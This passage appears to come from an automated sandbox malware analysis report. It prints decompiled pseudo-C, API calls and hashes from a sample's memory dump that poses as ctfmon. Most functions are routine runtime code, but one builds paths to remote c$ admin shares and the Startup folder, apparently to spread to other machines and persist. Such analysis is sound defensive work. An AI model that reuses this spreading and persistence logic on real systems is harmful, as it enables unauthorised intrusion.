                                                • LocalFree.KERNEL32(?,?,73B76490), ref: 00964F2C
                                                • CloseHandle.KERNEL32(00000000,?,73B76490), ref: 00964F3B
                                                Strings
                                                • C:\Windows\system32\msvcwme.log, xrefs: 00964E7D
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: CloseFileHandle$Local$AllocCreateFreeReadSize
                                                • String ID: C:\Windows\system32\msvcwme.log
                                                • API String ID: 47662278-2357825738
                                                • Opcode ID: 448f9129ac5d52e61c0e280c196b65a951f4d527edc10945ce20b514677d0119
                                                • Instruction ID: 5328c8f166c1dbbcd0f6be2e5705117d2fb4635f0991b2263891e34990ca29a6
                                                • Opcode Fuzzy Hash: 448f9129ac5d52e61c0e280c196b65a951f4d527edc10945ce20b514677d0119
                                                • Instruction Fuzzy Hash: BE31D375A14219AFDB108FA9EC8DBAEBBB8FF48321F110155F908E7380D7719814CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0097D142 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 152fileCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                C-Code - Quality: 74%
                                                			E0097D142(void* __ebx, void* __edi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				void* __esi;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t116;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t134;
				signed int _t135;
				void* _t136;

				_t78 =  *0x98f008; // 0x35554c2f
				_v8 = _t78 ^ _t135;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t116 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_t9 = _t116 + 0x18; // 0xcccccccc
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x996480 + _t118 * 4)) + _t9));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t134 = _a4;
				_v60 = _t86;
				 *_t134 = 0;
				 *((intOrPtr*)(_t134 + 4)) = 0;
				 *((intOrPtr*)(_t134 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x996480 + _v48 * 4));
					_t123 =  *(_t129 + _t116 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E0097C178(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x996480 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x996480 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x996480 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t134 + 4)) =  *((intOrPtr*)(_t134 + 4)) + 1;
							} else {
								_t112 = E00978950( &_v28, _t133, 2);
								_t136 = _t136 + 0xc;
								if(_t112 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t116 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E00978950();
						_t136 = _t136 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
									L19:
									 *_t134 = GetLastError();
								} else {
									 *((intOrPtr*)(_t134 + 4)) =  *((intOrPtr*)(_t134 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t134 + 8)) =  *((intOrPtr*)(_t134 + 8)) + 1;
													 *((intOrPtr*)(_t134 + 4)) =  *((intOrPtr*)(_t134 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E00970A5D(_v8 ^ _t135, _t134);
			}



































                                                0x0097d14a
                                                0x0097d151
                                                0x0097d154
                                                0x0097d15c
                                                0x0097d160
                                                0x0097d16c
                                                0x0097d16f
                                                0x0097d172
                                                0x0097d175
                                                0x0097d179
                                                0x0097d181
                                                0x0097d184
                                                0x0097d18a
                                                0x0097d190
                                                0x0097d195
                                                0x0097d197
                                                0x0097d19a
                                                0x0097d19f
                                                0x0097d1a9
                                                0x0097d1b0
                                                0x0097d1b3
                                                0x0097d1ba
                                                0x0097d1c1
                                                0x0097d1ed
                                                0x0097d213
                                                0x0097d215
                                                0x00000000
                                                0x0097d1ef
                                                0x0097d1f2
                                                0x0097d2b9
                                                0x0097d2c5
                                                0x0097d2d0
                                                0x0097d2d5
                                                0x0097d1f8
                                                0x0097d1ff
                                                0x0097d204
                                                0x0097d20a
                                                0x0097d210
                                                0x00000000
                                                0x0097d210
                                                0x0097d20a
                                                0x0097d1f2
                                                0x0097d1c3
                                                0x0097d1c7
                                                0x0097d1ca
                                                0x0097d1d0
                                                0x0097d1d2
                                                0x0097d1d5
                                                0x0097d1d9
                                                0x0097d216
                                                0x0097d219
                                                0x0097d21a
                                                0x0097d21f
                                                0x0097d225
                                                0x0097d22b
                                                0x0097d23a
                                                0x0097d240
                                                0x0097d246
                                                0x0097d24b
                                                0x0097d267
                                                0x0097d2da
                                                0x0097d2e0
                                                0x0097d269
                                                0x0097d271
                                                0x0097d27a
                                                0x0097d280
                                                0x00000000
                                                0x0097d282
                                                0x0097d284
                                                0x0097d287
                                                0x0097d2a0
                                                0x00000000
                                                0x0097d2a2
                                                0x0097d2a6
                                                0x0097d2a8
                                                0x0097d2ab
                                                0x00000000
                                                0x0097d2ab
                                                0x0097d2a6
                                                0x0097d2a0
                                                0x0097d280
                                                0x0097d27a
                                                0x0097d267
                                                0x0097d24b
                                                0x0097d225
                                                0x00000000
                                                0x0097d2ae
                                                0x0097d2ae
                                                0x0097d2e2
                                                0x0097d2f4

                                                APIs
                                                • GetConsoleCP.KERNEL32(00000010,0096971E,08A10000,?,?,?,?,?,?,0097D8B7,00000000,0096971E,00000010,0096971E,0096971E,?), ref: 0097D184
                                                • __fassign.LIBCMT ref: 0097D1FF
                                                • __fassign.LIBCMT ref: 0097D21A
                                                • WideCharToMultiByte.KERNEL32(?,00000000,0096971E,00000001,00000010,00000005,00000000,00000000), ref: 0097D240
                                                • WriteFile.KERNEL32(?,00000010,00000000,0097D8B7,00000000,?,?,?,?,?,?,?,?,?,0097D8B7,00000000), ref: 0097D25F
                                                • WriteFile.KERNEL32(?,00000000,00000001,0097D8B7,00000000,?,?,?,?,?,?,?,?,?,0097D8B7,00000000), ref: 0097D298
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                • String ID: /LU5/
                                                • API String ID: 1324828854-937868281
                                                • Opcode ID: 60c37837ef75bf970b37e8b7366b118b0d6875fae9bab833961bd2aeefef087f
                                                • Instruction ID: 86da9ff115920d2398e6c949e9371ef8bd52b47f99217f49b27d4889a6c2c7d2
                                                • Opcode Fuzzy Hash: 60c37837ef75bf970b37e8b7366b118b0d6875fae9bab833961bd2aeefef087f
                                                • Instruction Fuzzy Hash: B851C6729142099FDB10CFA8DC45AEEBBF8FF49700F14851AE969E7252D730D942CB64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00968A40 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 119COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 86%
                                                			E00968A40(void* __ecx, void* __eflags, intOrPtr _a4, char _a8) {
				long _v8;
				char _v16;
				char _v20;
				struct _CRITICAL_SECTION _v44;
				long _v48;
				long _v52;
				void* _v56;
				char _v60;
				signed int _t45;
				char _t53;
				void* _t60;
				void* _t84;
				void* _t96;
				void* _t100;
				signed int _t102;

				_push(0xffffffff);
				_push(E009846F8);
				_push( *[fs:0x0]);
				_t45 =  *0x98f008; // 0x35554c2f
				_push(_t45 ^ _t102);
				 *[fs:0x0] =  &_v16;
				_t96 = __ecx;
				_v60 = 0x98cab8;
				_v48 = 0;
				_v56 = 0;
				_v52 = 0;
				InitializeCriticalSection( &_v44);
				_v8 = 0;
				EnterCriticalSection( &_v44);
				_v52 = _v56;
				E00968840( &_v60, 0x400);
				LeaveCriticalSection( &_v44);
				_t53 = _a8;
				if(_t53 == 0 || _a4 == 0) {
					EnterCriticalSection( &_v44);
					_t28 = ( ==  ? 0 : _v52 - _v56) + 5; // 0x5
					if(E009687B0( &_v60, _t28) != 0xffffffff) {
						_t31 = _t96 + 0x214; // 0x2a0073
						 *_v52 =  *_t31;
						_t33 = _t96 + 0x218; // 0x0
						 *((char*)(_v52 + 4)) =  *_t33;
						_v52 = _v52 + 5;
					}
					LeaveCriticalSection( &_v44);
				} else {
					_v20 = _t53 + 0xd;
					_t17 = _t96 + 0x214; // 0x98cccc
					E00968690( &_v60, _t17, 5);
					E00968690( &_v60,  &_v20, 4);
					E00968690( &_v60,  &_a8, 4);
					E00968690( &_v60, _a4, _a8);
				}
				_t82 =  ==  ? 0 : _v52 - _v56;
				_push( ==  ? 0 : _v52 - _v56);
				_t60 = E009689D0(_t96, _v56,  ==  ? 0 : _v52 - _v56);
				_t84 = _v56;
				_t100 = _t60;
				_v60 = 0x98cab8;
				if(_t84 != 0) {
					VirtualFree(_t84, 0, 0x8000);
				}
				DeleteCriticalSection( &_v44);
				 *[fs:0x0] = _v16;
				return _t100;
			}


















                                                0x00968a43
                                                0x00968a45
                                                0x00968a50
                                                0x00968a56
                                                0x00968a5d
                                                0x00968a61
                                                0x00968a67
                                                0x00968a6c
                                                0x00968a74
                                                0x00968a7b
                                                0x00968a82
                                                0x00968a89
                                                0x00968a92
                                                0x00968a9a
                                                0x00968aab
                                                0x00968aae
                                                0x00968abd
                                                0x00968abf
                                                0x00968ac4
                                                0x00968b13
                                                0x00968b28
                                                0x00968b37
                                                0x00968b3c
                                                0x00968b42
                                                0x00968b47
                                                0x00968b4d
                                                0x00968b50
                                                0x00968b50
                                                0x00968b58
                                                0x00968acc
                                                0x00968ad2
                                                0x00968ad5
                                                0x00968ade
                                                0x00968aec
                                                0x00968afa
                                                0x00968b08
                                                0x00968b08
                                                0x00968b66
                                                0x00968b69
                                                0x00968b6e
                                                0x00968b73
                                                0x00968b76
                                                0x00968b78
                                                0x00968b81
                                                0x00968b8b
                                                0x00968b8b
                                                0x00968b95
                                                0x00968ba0
                                                0x00968bad

                                                APIs
                                                • InitializeCriticalSection.KERNEL32(?), ref: 00968A89
                                                • EnterCriticalSection.KERNEL32(?), ref: 00968A9A
                                                • LeaveCriticalSection.KERNEL32(?,00000400), ref: 00968ABD
                                                • EnterCriticalSection.KERNEL32(?), ref: 00968B13
                                                • LeaveCriticalSection.KERNEL32(?,00000005), ref: 00968B58
                                                • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00000000), ref: 00968B8B
                                                • DeleteCriticalSection.KERNEL32(?,00000000,00000000,00000000), ref: 00968B95
                                                  • Part of subcall function 00968690: EnterCriticalSection.KERNEL32(?,?,?,?,?,00968C1E,?,00967B57,35554C2F,73B76490,00000000,?), ref: 0096869C
                                                  • Part of subcall function 00968690: LeaveCriticalSection.KERNEL32(?,?,?,00968C1E,?,00967B57,35554C2F,73B76490,00000000,?), ref: 009686C5
                                                  • Part of subcall function 00968690: LeaveCriticalSection.KERNEL32(?,73B76490,00000000,?,?,?,?,?,?,?,?,?,00984728,000000FF,?,00967B57), ref: 009686E7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: CriticalSection$Leave$Enter$DeleteFreeInitializeVirtual
                                                • String ID: /LU5/
                                                • API String ID: 2514474324-937868281
                                                • Opcode ID: 132484b71248717c75363ebf29bca7c48f27a6ee3e1fa67be14923199402b79f
                                                • Instruction ID: 018e980cd18d05670314b9f429f1fcea9681b4946277320031d204c933c62ab2
                                                • Opcode Fuzzy Hash: 132484b71248717c75363ebf29bca7c48f27a6ee3e1fa67be14923199402b79f
                                                • Instruction Fuzzy Hash: 7F410CB1A10609ABCF04DFA8D895FDEBBB8FF48310F15462AF515E7290DB74A908CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009688D0 Relevance: 13.6, APIs: 9, Instructions: 94filesleepmemoryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E009688D0(intOrPtr* __ecx) {
				intOrPtr* _v8;
				long _v12;
				long _v16;
				struct _SECURITY_ATTRIBUTES* _t34;
				CHAR* _t36;
				void* _t37;
				intOrPtr _t39;
				intOrPtr* _t41;
				void* _t43;
				struct _SECURITY_ATTRIBUTES* _t44;
				long _t45;

				_t44 = 0;
				_t36 = __ecx + 0x110;
				_v8 = __ecx;
				_t43 = CreateFileA(_t36, 0x80000000, 1, 0, 3, 0x80, 0);
				if(_t43 != 0xffffffff) {
					L3:
					_t39 = _v8;
					_t4 = _t39 + 8; // 0x968e40
					_t5 = _t39 + 0xc; // 0x968ec0
					_t45 =  *_t5;
					_v12 =  *_t4;
					SetFilePointer(_t43, _t45,  &_v12, 0);
					_t37 = LocalAlloc(0x40, 0x19000);
					_t9 = _t37 + 9; // 0x9
					 *_t37 = 0x33;
					 *((intOrPtr*)(_t37 + 1)) = _v12;
					 *(_t37 + 5) = _t45;
					_v16 = 0;
					ReadFile(_t43, _t9, 0x18ff7,  &_v16, 0);
					CloseHandle(_t43);
					_t27 = _v16;
					_t41 = _v8;
					if(_v16 == 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *_t41)) + 0x18))();
						return LocalFree(_t37);
					}
					E00968A40(_t41, _t27 + 9, _t37, _t27 + 9);
					return LocalFree(_t37);
				} else {
					while(1) {
						_t34 = _t44;
						_t44 =  &(_t44->nLength);
						if(_t34 > 0xa) {
							break;
						}
						Sleep(0x12c);
						_t43 = CreateFileA(_t36, 0x80000000, 1, 0, 3, 0x80, 0);
						if(_t43 == 0xffffffff) {
							continue;
						} else {
							goto L3;
						}
						goto L7;
					}
					return _t34;
				}
				L7:
			}














                                                0x009688d9
                                                0x009688e8
                                                0x009688ee
                                                0x009688fd
                                                0x00968902
                                                0x0096893b
                                                0x0096893b
                                                0x00968940
                                                0x00968943
                                                0x00968943
                                                0x00968946
                                                0x0096894f
                                                0x00968962
                                                0x0096896f
                                                0x00968972
                                                0x00968979
                                                0x0096897c
                                                0x00968980
                                                0x00968987
                                                0x0096898e
                                                0x00968994
                                                0x00968997
                                                0x0096899c
                                                0x009689ba
                                                0x00000000
                                                0x009689be
                                                0x009689a3
                                                0x009689b5
                                                0x00968904
                                                0x00968904
                                                0x00968904
                                                0x00968906
                                                0x0096890a
                                                0x00000000
                                                0x00000000
                                                0x00968915
                                                0x00968934
                                                0x00968939
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00968939
                                                0x009689ca
                                                0x009689ca
                                                0x00000000

                                                APIs
                                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,00984635,?,00968D80), ref: 009688F7
                                                • Sleep.KERNEL32(0000012C,?,00968D80), ref: 00968915
                                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,00968D80), ref: 0096892E
                                                • SetFilePointer.KERNEL32(00000000,00968EC0,00968D80,00000000,?,00968D80), ref: 0096894F
                                                • LocalAlloc.KERNEL32(00000040,00019000,?,00968D80), ref: 0096895C
                                                • ReadFile.KERNEL32(00000000,00000009,00018FF7,?,00000000), ref: 00968987
                                                • CloseHandle.KERNEL32(00000000), ref: 0096898E
                                                • LocalFree.KERNEL32(00000000,00000000,-00000009), ref: 009689A9
                                                • LocalFree.KERNEL32(00000000), ref: 009689BE
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: File$Local$CreateFree$AllocCloseHandlePointerReadSleep
                                                • String ID:
                                                • API String ID: 2044486136-0
                                                • Opcode ID: d177e0517aff15d8f1d0443f3996edfaac4f61b717afb2960c470d9135931596
                                                • Instruction ID: f4a3b4dbcdb5b1b38a0e6575790a4aff249de27c13dd898c92cb7d4611118253
                                                • Opcode Fuzzy Hash: d177e0517aff15d8f1d0443f3996edfaac4f61b717afb2960c470d9135931596
                                                • Instruction Fuzzy Hash: 6031C176644204BFD710DBA4DC89FAABBBCEB09720F104195FA05EB2D0CAB09905CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0097C425 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 110COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 82%
                                                			E0097C425(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				void* __esi;
				signed int _t34;
				signed int _t40;
				int _t46;
				int _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t68;
				signed int _t69;
				short* _t70;

				_t34 =  *0x98f008; // 0x35554c2f
				_v8 = _t34 ^ _t69;
				E00974970(__ebx,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t53 =  *(_v24 + 8);
					_t57 = _t53;
					_a24 = _t53;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return E00970A5D(_v8 ^ _t69, _t68);
				}
				_t55 = _t40 + _t40;
				_t17 = _t55 + 8; // 0x990e88
				asm("sbb eax, eax");
				if((_t17 & _t40) == 0) {
					_t68 = 0;
					L11:
					if(_t68 != 0) {
						E00973440(_t67, _t68, _t67, _t55);
						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t68, _v12);
						if(_t46 != 0) {
							_t67 = GetStringTypeW(_a8, _t68, _t46, _a20);
						}
					}
					L14:
					E0097A677(_t68);
					goto L15;
				}
				_t20 = _t55 + 8; // 0x990e88
				asm("sbb eax, eax");
				_t48 = _t40 & _t20;
				_t21 = _t55 + 8; // 0x990e88
				_t63 = _t21;
				if((_t40 & _t20) > 0x400) {
					asm("sbb eax, eax");
					_t68 = E00977882(_t63, _t48 & _t63);
					if(_t68 == 0) {
						goto L14;
					}
					 *_t68 = 0xdddd;
					L9:
					_t68 =  &(_t68[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E00983C70();
				_t68 = _t70;
				if(_t68 == 0) {
					goto L14;
				}
				 *_t68 = 0xcccc;
				goto L9;
			}





















                                                0x0097c42d
                                                0x0097c434
                                                0x0097c440
                                                0x0097c445
                                                0x0097c44a
                                                0x0097c44f
                                                0x0097c452
                                                0x0097c454
                                                0x0097c454
                                                0x0097c459
                                                0x0097c472
                                                0x0097c478
                                                0x0097c47d
                                                0x0097c51c
                                                0x0097c520
                                                0x0097c525
                                                0x0097c525
                                                0x0097c541
                                                0x0097c541
                                                0x0097c483
                                                0x0097c486
                                                0x0097c48b
                                                0x0097c48f
                                                0x0097c4db
                                                0x0097c4dd
                                                0x0097c4df
                                                0x0097c4e4
                                                0x0097c4fb
                                                0x0097c503
                                                0x0097c513
                                                0x0097c513
                                                0x0097c503
                                                0x0097c515
                                                0x0097c516
                                                0x00000000
                                                0x0097c51b
                                                0x0097c491
                                                0x0097c496
                                                0x0097c498
                                                0x0097c49a
                                                0x0097c49a
                                                0x0097c4a2
                                                0x0097c4bf
                                                0x0097c4c9
                                                0x0097c4ce
                                                0x00000000
                                                0x00000000
                                                0x0097c4d0
                                                0x0097c4d6
                                                0x0097c4d6
                                                0x00000000
                                                0x0097c4d6
                                                0x0097c4a6
                                                0x0097c4aa
                                                0x0097c4af
                                                0x0097c4b3
                                                0x00000000
                                                0x00000000
                                                0x0097c4b5
                                                0x00000000

                                                APIs
                                                • MultiByteToWideChar.KERNEL32(123,00000000,?,?,00000000,00000000,?,77109EB0,?,123,00000001,?,?,00000001,?,?), ref: 0097C472
                                                • __alloca_probe_16.LIBCMT ref: 0097C4AA
                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0097C4FB
                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0097C50D
                                                • __freea.LIBCMT ref: 0097C516
                                                  • Part of subcall function 00977882: RtlAllocateHeap.NTDLL(00000000,77109EB0,00000000,?,00970A9A,77109EB0,?,00969C60,00000100,?,77109EB0), ref: 009778B4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                • String ID: /LU5/$123
                                                • API String ID: 313313983-4225885196
                                                • Opcode ID: 8d8c0b4ce09a1fea828b7852636dcefbbfee14f9dc659d823e347f856b2c9254
                                                • Instruction ID: 1f6a2922c028ec83f401e35a39ef8f060b69ab2a6f59c2ede02855e1344c5a72
                                                • Opcode Fuzzy Hash: 8d8c0b4ce09a1fea828b7852636dcefbbfee14f9dc659d823e347f856b2c9254
                                                • Instruction Fuzzy Hash: BF31E1B2A1020AABDF259F64DC49EAE7BA9EB40750F14812CFC18D7260E735DD54CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0096AC00 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 98COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 55%
                                                			E0096AC00(void* __ebx, char* __ecx, void* __edi, signed int _a8) {
				signed int _v8;
				char _v2052;
				short _v2060;
				char _v2564;
				short _v2572;
				char _v3098;
				void _v3100;
				char _v3340;
				char _v3348;
				char _v3352;
				short _v3356;
				intOrPtr _v3360;
				void* __esi;
				signed int _t22;
				int _t26;
				void* _t30;
				void* _t48;
				char* _t65;
				void* _t66;
				void* _t68;
				signed int _t69;
				signed int _t71;
				void* _t72;

				_t71 = (_t69 & 0xfffffff8) - 0xd1c;
				_t22 =  *0x98f008; // 0x35554c2f
				_v8 = _t22 ^ _t71;
				_push(__edi);
				_t65 = __ecx;
				E00973440(__edi,  &_v3356, 0, 0x100);
				_t60 = MultiByteToWideChar;
				_t72 = _t71 + 0xc;
				_t26 = MultiByteToWideChar(0, 0, _t65, 0xffffffff, 0, 0);
				if(_t26 <= 0x80) {
					MultiByteToWideChar(0, 0, _t65, 0xffffffff,  &_v3356, _t26);
				}
				_t48 = L"c$\\Documents and Settings\\";
				_v3360 = 4;
				do {
					E00973440(_t60,  &_v3098, 0, 0x206);
					_t66 = _t48;
					_t30 = memcpy( &_v3100, _t66, 0x40 << 2);
					_t60 = _t66 + 0x80;
					E00973440(_t66 + 0x80, _t30, 0, 0x800);
					wsprintfW( &_v2060, L"\\\\%ws\\%ws",  &_v3356,  &_v3100);
					E0096AA40(_t48,  &_v2052,  &_v3348, _t66 + 0x80);
					_t72 = _t72 + 0x34;
					_t48 = _t48 + 0x100;
					_t14 =  &_v3352;
					 *_t14 = _v3352 - 1;
				} while ( *_t14 != 0);
				E00973440(_t60,  &_v2572, 0, 0x208);
				wsprintfW( &_v2572, L"\\\\%ws\\%ws",  &_v3348, L"c$\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup");
				E0096A760(_t48,  &_v2564,  &_v3340, _t60);
				_pop(_t68);
				return E00970A5D(_a8 ^ _t72 + 0x1c, _t68);
			}


























                                                0x0096ac06
                                                0x0096ac0c
                                                0x0096ac13
                                                0x0096ac1c
                                                0x0096ac26
                                                0x0096ac2b
                                                0x0096ac30
                                                0x0096ac36
                                                0x0096ac44
                                                0x0096ac4b
                                                0x0096ac5a
                                                0x0096ac5a
                                                0x0096ac5c
                                                0x0096ac61
                                                0x0096ac70
                                                0x0096ac7f
                                                0x0096ac9a
                                                0x0096ac9c
                                                0x0096ac9c
                                                0x0096aca6
                                                0x0096acce
                                                0x0096acde
                                                0x0096ace3
                                                0x0096ace6
                                                0x0096acec
                                                0x0096acec
                                                0x0096acec
                                                0x0096ad06
                                                0x0096ad25
                                                0x0096ad35
                                                0x0096ad44
                                                0x0096ad50

                                                APIs
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?), ref: 0096AC44
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 0096AC5A
                                                • wsprintfW.USER32 ref: 0096ACCE
                                                • wsprintfW.USER32 ref: 0096AD25
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWidewsprintf
                                                • String ID: /LU5/$\\%ws\%ws$c$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
                                                • API String ID: 1452142677-1121874209
                                                • Opcode ID: 0087d553bfce0b1490dd3aa9d377ddfb504f6352f20dfab29afd7e5c18ab22b4
                                                • Instruction ID: e13b1b9ed37155111b8026a8bdab311ff245dd63657fc95a73aaf637f85a62f4
                                                • Opcode Fuzzy Hash: 0087d553bfce0b1490dd3aa9d377ddfb504f6352f20dfab29afd7e5c18ab22b4
                                                • Instruction Fuzzy Hash: 783189B25443046BD630EB50DC46FDB73DCEF84714F144929FA58A71C1EAB4A6188BE7
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00973060 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 115COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 68%
                                                			E00973060(void* __ebx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				long _v32;
				WCHAR* _v36;
				struct HINSTANCE__* _v40;
				void* __edi;
				void* __esi;
				void* _t54;
				long _t56;
				signed int _t62;
				intOrPtr _t63;
				void* _t64;
				intOrPtr _t67;
				long _t69;
				intOrPtr _t72;
				intOrPtr _t74;
				signed int _t76;
				char _t78;
				void* _t90;
				intOrPtr _t91;
				WCHAR* _t93;
				intOrPtr _t96;
				long _t98;
				intOrPtr* _t100;
				void* _t103;
				void* _t104;
				void* _t110;

				_t72 = _a8;
				_push(_t90);
				_v5 = 0;
				_t96 = _t72 + 0x10;
				_push(_t96);
				_v16 = 1;
				_v20 = _t96;
				_v12 =  *(_t72 + 8) ^  *0x98f008;
				_t54 = E00973020(_t90, _t96,  *(_t72 + 8) ^  *0x98f008);
				_t91 = _a12;
				_push(_t91);
				E00971802(_t54);
				_t56 = _a4;
				_t104 = _t103 + 0xc;
				if(( *(_t56 + 4) & 0x00000066) != 0) {
					__eflags =  *((intOrPtr*)(_t72 + 0xc)) - 0xfffffffe;
					if( *((intOrPtr*)(_t72 + 0xc)) != 0xfffffffe) {
						E00974097(_t72, 0xfffffffe, _t96, "/LU5/");
						goto L18;
					}
					goto L19;
				} else {
					_v32 = _t56;
					_v28 = _t91;
					_t91 =  *((intOrPtr*)(_t72 + 0xc));
					 *((intOrPtr*)(_t72 - 4)) =  &_v32;
					if(_t91 == 0xfffffffe) {
						L19:
						return _v16;
					} else {
						do {
							_t76 = _v12;
							_t19 = _t91 + 2; // 0x3
							_t62 = _t91 + _t19 * 2;
							_t74 =  *((intOrPtr*)(_t76 + _t62 * 4));
							_t63 = _t76 + _t62 * 4;
							_t77 =  *((intOrPtr*)(_t63 + 4));
							_v24 = _t63;
							if( *((intOrPtr*)(_t63 + 4)) == 0) {
								_t78 = _v5;
